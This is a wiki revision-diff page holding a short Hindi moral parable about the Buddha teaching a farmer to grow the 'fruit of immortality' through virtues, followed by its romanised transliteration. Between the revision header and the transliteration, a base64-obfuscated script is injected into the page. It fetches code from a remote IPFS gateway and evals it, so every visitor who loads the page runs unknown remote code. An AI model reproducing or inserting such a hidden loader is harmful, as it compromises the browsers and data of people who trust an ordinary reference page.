Difference between revisions of "अमरत्व का फल -महात्मा बुद्ध"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{सूचना बक्सा संक्षिप्त परिचय |चित्र=Budha_prerak.png |चित्र का ...' के साथ नया पन्ना बनाया)
 
Line 28: Line 28:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
 
<poem style="background:#fbf8df; padding:15px; font-size:14px; border:1px solid #003333; border-radius:5px">
 
<poem style="background:#fbf8df; padding:15px; font-size:14px; border:1px solid #003333; border-radius:5px">
एक दिन एक किसान बुद्ध के पास आया और बोला, ‘महाराज, मैं एक साधारण किसान हूं। बीज बोकर, हल चला कर अनाज उत्पन्न करता हूं और तब उसे ग्रहण करता हूं । किंतु इससे मेरे मन को तसल्ली नहीं मिलती। मैं कुछ ऐसा करना चाहता हूं जिससे मेरे खेत में अमरत्व के फल उत्पन्न हों। आप मुझे मार्गदर्शन दीजिए जिससे मेरे खेत में अमरत्व के फल उत्पन्न होने लगें।’बात सुनकर बुद्ध मुस्कराकर बोले,
+
एक दिन एक किसान [[बुद्ध]] के पास आया और बोला, ‘महाराज, मैं एक साधारण किसान हूं। बीज बोकर, हल चला कर अनाज उत्पन्न करता हूं और तब उसे ग्रहण करता हूं। किंतु इससे मेरे मन को तसल्ली नहीं मिलती। मैं कुछ ऐसा करना चाहता हूं जिससे मेरे खेत में अमरत्व के फल उत्पन्न हों। आप मुझे मार्गदर्शन दीजिए जिससे मेरे खेत में अमरत्व के फल उत्पन्न होने लगें।’ बात सुनकर बुद्ध मुस्कराकर बोले,
  
‘भले व्यक्ति, तुम्हें अमरत्व का फल तो अवश्य मिल सकता है किंतु इसके लिए तुम्हें खेत में बीज न बोकर अपने मन में बीज बोने होंगे?’ यह सुनकर किसान हैरानी से बोला, ‘प्रभु, आप यह क्या कह रहे हैं? भला मन के बीज बोकर भी फल प्राप्त हो सकते हैं।’बुद्ध बोले, ‘बिल्कुल हो सकते हैं और इन बीजों से तुम्हें जो फल प्राप्त होंगे वे वाकई साधारण न होकर अद्भुत होंगे जो तुम्हारे जीवन को भी सफल बनाएंगे और तुम्हें नेकी की राह दिखाएंगे।’
+
‘भले व्यक्ति, तुम्हें अमरत्व का फल तो अवश्य मिल सकता है किंतु इसके लिए तुम्हें खेत में बीज न बोकर अपने मन में बीज बोने होंगे?’ यह सुनकर किसान हैरानी से बोला, ‘प्रभु, आप यह क्या कह रहे हैं? भला मन के बीज बोकर भी फल प्राप्त हो सकते हैं।’
 +
बुद्ध बोले, ‘बिल्कुल हो सकते हैं और इन बीजों से तुम्हें जो फल प्राप्त होंगे वे वाकई साधारण न होकर अद्भुत होंगे जो तुम्हारे जीवन को भी सफल बनाएंगे और तुम्हें नेकी की राह दिखाएंगे।’
  
किसान ने कहा , ‘प्रभु, तब तो मुझे अवश्य बताइए कि मैं मन में बीज कैसे बोऊं?’
+
किसान ने कहा, ‘प्रभु, तब तो मुझे अवश्य बताइए कि मैं मन में बीज कैसे बोऊं?’
  
 
बुद्ध बोले, ‘तुम मन में विश्वास के बीज बोओ, विवेक का हल चलाओ, ज्ञान के जल से उसे सींचो और उसमें नम्रता का उर्वरक डालो। इससे तुम्हें अमरत्व का फल प्राप्त होगा। उसे खाकर तुम्हारे सारे दु:ख दूर हो जाएंगे और तुम्हें असीम शांति का अनुभव होगा।’ बुद्ध से अमरत्व के फल की प्राप्ति की बात सुनकर किसान की आंखें खुल गईं। वह समझ गया कि अमरत्व का फल सद्विचारों के द्वारा ही प्राप्त किया जा सकता है।
 
बुद्ध बोले, ‘तुम मन में विश्वास के बीज बोओ, विवेक का हल चलाओ, ज्ञान के जल से उसे सींचो और उसमें नम्रता का उर्वरक डालो। इससे तुम्हें अमरत्व का फल प्राप्त होगा। उसे खाकर तुम्हारे सारे दु:ख दूर हो जाएंगे और तुम्हें असीम शांति का अनुभव होगा।’ बुद्ध से अमरत्व के फल की प्राप्ति की बात सुनकर किसान की आंखें खुल गईं। वह समझ गया कि अमरत्व का फल सद्विचारों के द्वारा ही प्राप्त किया जा सकता है।
  
  
 
+
;[[बुद्ध|महात्मा बुद्ध]] से जुड़े अन्य प्रसंग पढ़ने के लिए [[महात्मा बुद्ध के प्रेरक प्रसंग]] पर जाएँ। 
;[[महात्मा बुद्ध]] से जुडे अन्य प्रसंग पढ़ने के लिए [[महात्मा बुद्ध के प्रेरक प्रसंग]] पर जाएँ
 
 
 
 
</poem>
 
</poem>
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
[[Category:अशोक कुमार शुक्ला]][[Category:महात्मा बुद्ध]]
+
[[Category:अशोक कुमार शुक्ला]][[Category:समकालीन साहित्य]][[Category:प्रेरक प्रसंग]][[Category:गौतम बुद्ध]]
[[Category:पुस्तक कोश]]
+
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__
 
<noinclude>[[Category:प्रेरक प्रसंग]]</noinclude>
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 

Revision as of 07:28, 14 August 2014

amaratv ka phal -mahatma buddh
vivaran is lekh mean mahatma buddh se sanbandhit prerak prasangoan ke liank diye gaye haian.
bhasha hiandi
desh bharat
mool shirshak prerak prasang
up shirshak mahatma buddh ke prerak prasang
sankalanakarta ashok kumar shukla

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ek din ek kisan buddh ke pas aya aur bola, ‘maharaj, maian ek sadharan kisan hooan. bij bokar, hal chala kar anaj utpann karata hooan aur tab use grahan karata hooan. kiantu isase mere man ko tasalli nahian milati. maian kuchh aisa karana chahata hooan jisase mere khet mean amaratv ke phal utpann hoan. ap mujhe margadarshan dijie jisase mere khet mean amaratv ke phal utpann hone lagean.’ bat sunakar buddh muskarakar bole,

‘bhale vyakti, tumhean amaratv ka phal to avashy mil sakata hai kiantu isake lie tumhean khet mean bij n bokar apane man mean bij bone hoange?’ yah sunakar kisan hairani se bola, ‘prabhu, ap yah kya kah rahe haian? bhala man ke bij bokar bhi phal prapt ho sakate haian.’
buddh bole, ‘bilkul ho sakate haian aur in bijoan se tumhean jo phal prapt hoange ve vakee sadharan n hokar adbhut hoange jo tumhare jivan ko bhi saphal banaeange aur tumhean neki ki rah dikhaeange.’

kisan ne kaha, ‘prabhu, tab to mujhe avashy bataie ki maian man mean bij kaise boooan?’

buddh bole, ‘tum man mean vishvas ke bij boo, vivek ka hal chalao, jnan ke jal se use siancho aur usamean namrata ka urvarak dalo. isase tumhean amaratv ka phal prapt hoga. use khakar tumhare sare du:kh door ho jaeange aur tumhean asim shaanti ka anubhav hoga.’ buddh se amaratv ke phal ki prapti ki bat sunakar kisan ki aankhean khul geean. vah samajh gaya ki amaratv ka phal sadvicharoan ke dvara hi prapt kiya ja sakata hai.


mahatma buddh se ju de any prasang padhane ke lie mahatma buddh ke prerak prasang par jaean.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh